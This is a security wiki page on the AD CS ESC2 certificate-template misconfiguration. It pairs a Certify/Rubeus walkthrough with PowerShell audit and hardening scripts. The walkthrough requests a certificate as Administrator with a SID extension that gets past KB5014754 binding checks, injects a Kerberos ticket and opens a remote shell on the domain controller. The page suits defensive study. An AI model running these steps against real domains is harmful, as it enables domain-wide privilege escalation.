# ESC2

### What is ESC2?

ESC2 is an Active Directory Certificate Services (AD CS) privilege escalation misconfiguration caused by certificate templates that are configured with overly permissive Extended Key Usages (EKUs). A low-privileged domain user can request a certificate under these templates and abuse it to compromise the PKI infrastructure or authenticate to other services.

> **Key difference from ESC1:** ESC1 uses the **Client Authentication** EKU, which allows direct Kerberos PKINIT authentication. ESC2 uses **Any Purpose** or **No EKU**, which may not work for PKINIT directly but enables broader and often more dangerous abuse paths.

***

### Vulnerable EKU Configurations

| EKU Type        | OID           | Meaning                           | Abuse Potential                                       |
| --------------- | ------------- | --------------------------------- | ----------------------------------------------------- |
| **Any Purpose** | `2.5.29.37.0` | Wildcard — valid for all purposes | Client Auth, Code Signing, Server Auth, EFS, etc.     |
| **No EKU**      | *(absent)*    | Implicitly a SubCA template       | Can issue ANY cert for ANY user — full PKI compromise |

***

### Required Conditions

All of the following must be true on the vulnerable template:

* [x] `ENROLLEE_SUPPLIES_SUBJECT` flag is enabled (`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`)
* [x] EKU is set to **Any Purpose** (`2.5.29.37.0`) **or** is completely absent (SubCA)
* [x] Low-privileged users have **Enroll** or **AutoEnroll** rights on the template
* [x] Manager approval is **not** required
* [x] No authorized signatures required
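
The following audit script is an added example for this page, not code from the original notes or from Certify/Certipy. It walks every certificate template object in the Configuration partition, checks each of the five conditions above, and emits the templates that meet all of them, together with whether the template is published on an enterprise CA (a finding only matters if it is). It needs the ActiveDirectory RSAT module; the `$LowPrivPrincipals` list is an assumption you should extend with any other broad groups in your forest.

```powershell
# Added audit example (not from the original page): report templates that
# satisfy every ESC2 condition listed above and show whether each is published.
$ErrorActionPreference = 'Stop'
Import-Module ActiveDirectory

# Bit values from the msPKI-* template attributes (MS-CRTD)
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002   # msPKI-Enrollment-Flag: manager approval
$AnyPurposeOid                     = '2.5.29.37.0'
$ExtendedRightBit                  = 0x100        # ActiveDirectoryRights.ExtendedRight (GenericAll includes it)

# Control-access-right GUIDs for Certificate-Enrollment and Certificate-AutoEnrollment
$EnrollRightGuids = @('0e10c968-78fb-11d2-90d4-00c04f79dc55', 'a05b8cc2-17bc-00de-a9f5-f85d79f6c2d3')

# Principals that should never hold Enroll on a template whose requester picks the subject (assumption)
$LowPrivPrincipals = @('Authenticated Users', 'Domain Users', 'Domain Computers', 'Everyone', 'Users')

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiBase  = "CN=Public Key Services,CN=Services,$configNC"

# Template names published on any enterprise CA (certificateTemplates on pKIEnrollmentService)
$published = Get-ADObject -SearchBase "CN=Enrollment Services,$pkiBase" `
    -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates |
    ForEach-Object { $_.certificateTemplates }

$props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature',
         'pKIExtendedKeyUsage', 'nTSecurityDescriptor'
$templates = Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" `
    -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props

foreach ($t in $templates) {
    $nameFlag   = [int]$t.'msPKI-Certificate-Name-Flag'
    $enrollFlag = [int]$t.'msPKI-Enrollment-Flag'
    $raSigs     = [int]$t.'msPKI-RA-Signature'
    $ekus       = @($t.pKIExtendedKeyUsage | Where-Object { $_ })

    $suppliesSubject = ($nameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $managerApproval = ($enrollFlag -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
    $noEku           = $ekus.Count -eq 0
    $anyPurpose      = $ekus -contains $AnyPurposeOid

    # Allow ACEs granting Enroll/AutoEnroll, or every extended right (empty ObjectType, GenericAll)
    $enrollers = $t.nTSecurityDescriptor.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.ActiveDirectoryRights -band $ExtendedRightBit) -ne 0) -and
            ($_.ObjectType -eq [guid]::Empty -or $_.ObjectType.ToString() -in $EnrollRightGuids)
        } |
        ForEach-Object { ($_.IdentityReference.Value -split '\\')[-1] }
    $lowPrivEnroll = @($enrollers | Where-Object { $_ -in $LowPrivPrincipals } | Sort-Object -Unique)

    $isEsc2 = $suppliesSubject -and ($noEku -or $anyPurpose) -and
              -not $managerApproval -and $raSigs -eq 0 -and $lowPrivEnroll.Count -gt 0
    if ($isEsc2) {
        $ekuLabel = if ($noEku) { 'No EKU (SubCA)' } else { 'Any Purpose' }
        [pscustomobject]@{
            Template  = $t.Name
            Published = ($published -contains $t.Name)
            EKU       = $ekuLabel
            Enrollers = ($lowPrivEnroll -join ', ')
        }
    }
}
```

Any authenticated user can read the templates container by default, so this runs without elevated rights. The ACE filter deliberately treats an empty `ObjectType` and `GenericAll` as granting Enroll, since both include the enrollment extended right; a template with `Published = False` is not exploitable today but becomes so the moment a CA publishes it, so it still deserves fixing.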

***

### ESC2 vs ESC1 - Key Comparison

|                           | ESC1                                   | ESC2                                       |
| ------------------------- | -------------------------------------- | ------------------------------------------ |
| **EKU**                   | Client Authentication                  | Any Purpose / No EKU                       |
| **Direct PKINIT (TGT)**   | ✅ Works reliably                       | ⚠️ Often fails — depends on DC patch level |
| **SubCA forgery**         | ❌ Not applicable                       | ✅ Possible with No EKU variant             |
| **Code signing abuse**    | ❌                                      | ✅                                          |
| **Schannel / LDAPS auth** | ✅                                      | ✅                                          |
| **Primary abuse path**    | Request cert → `asktgt` → Domain Admin | Request cert → SubCA chain or Schannel     |

***

### Core Concepts

#### "Any Purpose" EKU (OID: `2.5.29.37.0`)

A wildcard EKU that instructs Windows to accept the certificate for any purpose. This includes:

* Client Authentication
* Server Authentication
* Code Signing
* Encrypting File System (EFS)

#### "No EKU" (SubCA Template)

When a template has no EKU extension at all, the issued certificate behaves like a **Subordinate Certificate Authority**. This means:

* The certificate can **sign and issue new certificates**
* You can forge a certificate for **any user** with **any EKU** (including Client Authentication)
* This is effectively **complete PKI compromise**

***

### Exploitation - Windows (Certify + Rubeus)

#### Step 1 - Find Vulnerable Templates

```
certify.exe find /enrolleeSuppliesSubject
```

**What to look for in output:**

```
[!] Vulnerable Certificates Templates :

    CA Name                : DC01.l1nuxkid.corp\l1nuxkid-CA
    Template Name          : VulnerableTemplate
    ...
    Enabled                : True
    Client Authentication  : False
    Enrollee Supplies Subject : True
    Certificate Name Flag  : EnrolleeSuppliesSubject
    pkiextendedkeyusage    : Any Purpose          <-- ESC2 "Any Purpose"
    mspki-certificate-...  : Any Purpose
    ...
    [+] User has enroll rights for template
```

***

#### Step 2 - Get Domain SID

```powershell
# Method 1 - Get the SID of the Administrator account directly
(Get-ADUser -Identity administrator -Server l1nuxkid.corp).SID.Value

# Method 2 - Get the Domain SID (Administrator is always RID 500)
(Get-ADDomain).DomainSID.Value
# Result example: S-1-5-21-1234567890-987654321-1122334455
# Administrator SID = <DomainSID>-500
```

***

#### Step 3 - Request Certificate as Administrator

```
certify.exe request /ca:CA_SERVER\CA_NAME /template:TEMPLATE_NAME /altname:administrator /sidextension:S-1-5-21-DOMAIN-500 /domain:l1nuxkid.dev
```

| Flag                                | Purpose                                                     |
| ----------------------------------- | ----------------------------------------------------------- |
| `/altname:administrator`            | Embed Administrator as the Subject Alternative Name         |
| `/sidextension:S-1-5-21-DOMAIN-500` | Adds the SID extension — bypasses the CBA patch (KB5014754) |
| `/domain:`                          | Target domain                                               |

Save the output PEM block as `esc2.pem`.

***

#### Step 4 - Convert Certificate to PFX

```bash
openssl pkcs12 -in esc2.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc2.pfx
```

You will be prompted for an export password; remember it, since the next step needs it.

***

#### Step 5 - Attempt Direct PKINIT Authentication

```
Rubeus.exe asktgt /user:administrator /domain:l1nuxkid.dev /certificate:esc2.pfx /password:password123 /dc:DC01.l1nuxkid.dev /nowrap /ptt
```

***

#### Step 6 - Verify & Use

```cmd
REM Verify the Kerberos ticket was injected into memory
klist

REM Spawn a remote shell on the Domain Controller
winrs -r:DC01.l1nuxkid.dev cmd.exe
```

***

### Mitigations

* Remove `ENROLLEE_SUPPLIES_SUBJECT` from sensitive templates
* Restrict enroll rights to only required users/groups
* Enable Manager Approval on sensitive templates
* Apply KB5014754 and set `StrongCertificateBindingEnforcement = 2`
* Regularly audit templates with: `certutil -TCAInfo` and Certify/Certipy
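
The script below is an added example, not part of the original page. It applies the template-level mitigations from the list above to one template (clears `ENROLLEE_SUPPLIES_SUBJECT`, enables manager approval, removes the broad group's Enroll/AutoEnroll ACEs) and then reports the KB5014754 `StrongCertificateBindingEnforcement` mode on every domain controller. `$TemplateName`, `$StripGroup` and the registry path are the only assumptions; the path is the documented KDC key for that value.

```powershell
# Added hardening example (not from the original page): fix one ESC2 template
# and verify the KDC certificate-binding enforcement mode on each DC.
$ErrorActionPreference = 'Stop'
Import-Module ActiveDirectory

$TemplateName = 'VulnerableTemplate'   # cn of the template to harden (assumption)
$StripGroup   = 'Domain Users'         # broad group whose Enroll rights are removed (assumption)

$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002   # msPKI-Enrollment-Flag: manager approval
$EnrollRightGuids = @('0e10c968-78fb-11d2-90d4-00c04f79dc55', 'a05b8cc2-17bc-00de-a9f5-f85d79f6c2d3')

$configNC = (Get-ADRootDSE).configurationNamingContext
$dn = "CN=$TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"
$t  = Get-ADObject -Identity $dn -Properties 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag'

# 1. Clear ENROLLEE_SUPPLIES_SUBJECT so the CA builds the subject/SAN from AD, not from the request
$newNameFlag = [int]$t.'msPKI-Certificate-Name-Flag' -band (-bnot $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
# 2. Require CA certificate-manager approval before anything is issued from this template
$newEnrollFlag = [int]$t.'msPKI-Enrollment-Flag' -bor $CT_FLAG_PEND_ALL_REQUESTS
Set-ADObject -Identity $dn -Replace @{
    'msPKI-Certificate-Name-Flag' = $newNameFlag
    'msPKI-Enrollment-Flag'       = $newEnrollFlag
}

# 3. Remove the Enroll/AutoEnroll ACEs held by the broad group on the template object
$acl   = Get-Acl -Path "AD:\$dn"
$stale = @($acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $_.IdentityReference.Value -like "*\$StripGroup" -and
    $_.ObjectType.ToString() -in $EnrollRightGuids
})
foreach ($ace in $stale) { [void]$acl.RemoveAccessRule($ace) }
if ($stale.Count -gt 0) { Set-Acl -Path "AD:\$dn" -AclObject $acl }

# 4. KB5014754: report StrongCertificateBindingEnforcement on every DC
#    0 = disabled, 1 = compatibility, 2 = full enforcement (the page's target value)
$dcs = (Get-ADDomainController -Filter *).HostName
Invoke-Command -ComputerName $dcs -ScriptBlock {
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc'
    $v    = Get-ItemProperty -Path $key -Name StrongCertificateBindingEnforcement -ErrorAction SilentlyContinue
    $mode = if ($null -eq $v) { 'not set (patch-level default)' } else { $v.StrongCertificateBindingEnforcement }
    [pscustomobject]@{ DC = $env:COMPUTERNAME; StrongCertificateBindingEnforcement = $mode }
    # Once no legitimate certificate still lacks the SID extension, enforce with:
    # Set-ItemProperty -Path $key -Name StrongCertificateBindingEnforcement -Value 2 -Type DWord
}
```

Editing objects under the Certificate Templates container normally requires Enterprise Admin rights, and enterprise CAs pick the changed flags up from AD without a restart. Enforcement mode 2 is left as a commented line rather than applied blindly, because it also rejects legitimate certificates issued before the patch that carry no SID extension; review the KDC's compatibility-mode warnings first, then set it.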

***

### Tools Reference

| Tool                                            | Platform      | Use Case                             |
| ----------------------------------------------- | ------------- | ------------------------------------ |
| [Certify](https://github.com/GhostPack/Certify) | Windows       | Enumerate & request certificates     |
| [Rubeus](https://github.com/GhostPack/Rubeus)   | Windows       | PKINIT TGT requests, pass-the-ticket |
| [Certipy](https://github.com/ly4k/Certipy)      | Linux         | All-in-one: enum, request, auth      |
| `openssl`                                       | Linux/Windows | PEM → PFX conversion                 |
| `certutil`                                      | Windows       | Built-in CA enumeration              |
